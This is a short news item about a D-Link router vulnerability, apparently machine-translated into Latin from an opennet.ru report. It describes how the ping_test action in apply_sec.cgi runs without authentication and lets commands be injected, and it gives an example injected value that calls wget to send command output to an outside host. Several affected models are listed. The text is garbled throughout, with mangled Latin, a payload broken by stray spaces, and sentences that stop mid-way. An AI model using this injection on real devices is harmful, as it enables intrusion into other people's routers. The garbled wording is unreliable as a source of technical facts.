In D-Link wireless iter itineris
Interestingly, secundum tincidunt firmware, vocatio "ping_test" solum post authenticationem exsecutioni mandari debet, re vera vero vocatur in casu, cuiuscumque colligationis in interfaciem interretialis. Praesertim, cum scripturae applicatio_sec.cgi accedens et "actio ping_test" parametri transeat, scriptura redit ad paginam authenticas, sed simul actionem cum ping_test coniungit. Ad codicem exsequendum, alia vulnerabilitas in ipso testo pingendi adhibita est, quae pingens utilitatem vocat, quin recte reprehendat rectitudinem IP inscriptionis ad probandum. Exempli gratia, utilitatem wget vocare et eventum "echo 1234" ad exercitum externum transferre, modulum "ping_ipaddr=127.0.0.1%0awget% 20-P% 20/tmp/ 20http://". test.test/?$( resonare 1234)".
Praesentia vulnerabilitas in sequentibus exemplaribus publice confirmata est:
- DIR-655 firmware 3.02b05 vel maior;
- DIR-866L cum firmware 1.03b04 vel maior;
- DIR-1565 cum firmware 1.01 vel senior;
- DIR-652 (nulla notitia de versionibus firmware problematicarum provisorum)
Firmamentum tempus horum exemplorum iam exspiravit, ut D-Link
Postea compertum est vulnerabilitatem etiam fuisse
Source: opennet.ru